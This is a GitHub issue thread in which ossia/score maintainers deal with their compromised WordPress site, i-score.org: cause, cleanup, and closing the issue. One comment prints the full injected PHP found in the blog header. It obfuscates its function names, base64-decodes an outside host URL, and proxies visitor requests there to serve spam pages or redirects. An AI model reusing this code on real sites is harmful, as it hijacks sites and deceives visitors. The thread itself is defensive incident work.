### ISSUE TITLE
website hacked?

### ISSUE THREAD

**Issue by micuat** [ossia/score#420]
It seems your website i-score.org has a problem... the google search shows "this site may be hacked" and there's a weird paragraph at the end of this page: http://i-score.org/download/

**Comment by jcelerier** [comment]
Thanks for telling us :( we noticed a few days ago. Sounds like some Wordpress bot even though it was updated not too long ago.

**Comment by jln-** [comment]
Thanks, indeed. I just did a manual cleaning of all pages & articles so consequences of the hack are fixed. Cause are not, though. @reno- could you have a look if you spot something (and close issue if it looks ok) ?

**Comment by reno-** [comment]
I'm working on it

**Comment by reno-** [comment]
a user(admin) had a silly password (azerty) and bot took control
it injects that code in the blog-header and generate fake pages
```
$e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION);

if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) ||
    basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) ||
        (stripos($u = $_SERVER["HTTP_USER_AGENT"], "AhrefsBot") === false && stripos($u, "MJ12bot") === false))) {

    $at = "base64_" . "decode";

    $ch = curl_init($at("aHR0cDovL2RvbWZvcnVsdHJhZG9ycy5jb20vPw==") . "f6f8864c64468430a4cf02359d075096" . $p);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            "X-Forwarded-For: " . @$_SERVER["REMOTE_ADDR"])
    );

    if (isset($_SERVER["HTTP_USER_AGENT"]))
        curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);

    if (isset($_SERVER["HTTP_REFERER"]))
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);

    $ci = "curl_ex" . "ec";

    $data = $ci($ch);
    $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

    if (strlen($data) > 255 && $code == 200) {
        echo $data; exit;
    } else if ($data && ($code == 301 || $code == 302)) {
        header("Location: " . trim($data), true, $code); exit;
    }
}
```

**Comment by avilleret** [comment]
@reno-  this have been fixed right ?

**Comment by reno-** [comment]
No, i thought it was, but google just send me a mail with new hacked pages.
I will fix it tomorrow.

**Comment by jcelerier** [comment]
my wordpress password has a dozen special characters so I doubt it's me...

**Comment by ktatar** [comment]
We had similar problems with another website. I think there was a security issue with wordpress. We updated the wordpress, deleted all the accounts, and created new ones. That was a fix.

**Comment by jcelerier** [comment]
I propose we implement @ktatar's solution today: for instance the "Download i-score" in the download page had also disappeared due to a bot modification.

**Comment by jcelerier** [comment]
arghh and tutorials also were moved out from the "tutorial" section again.

**Comment by avilleret** [comment]
is there a way to know from which account those modifications are made ?
I changed my password with a secure one as soon as I know that my account was involved
but if my account is involved again, then it should be deleted without any warning

**Comment by jcelerier** [comment]
I checked the revision history and apprently it's been a month since the "download" link was missing. oh well :) 

also, all the edits I saw in the "hacked pages" (nb: there are still some; @jln- you should edit the pages in text mode and not html mode to see the remaining ones) were from your account @avilleret so maybe we're good

**Comment by reno-** [comment]
Google removed the "website hacked" flag for i-score.org
I linked 404 to home.
I think it's now ok, and we can close the issue.

I suggest to close the issue now, and if there is another new hack for the website, I will delete all accounts as suggested.

Any opinions?

**Comment by jcelerier** [comment]
sounds good to me! thanks @reno- !
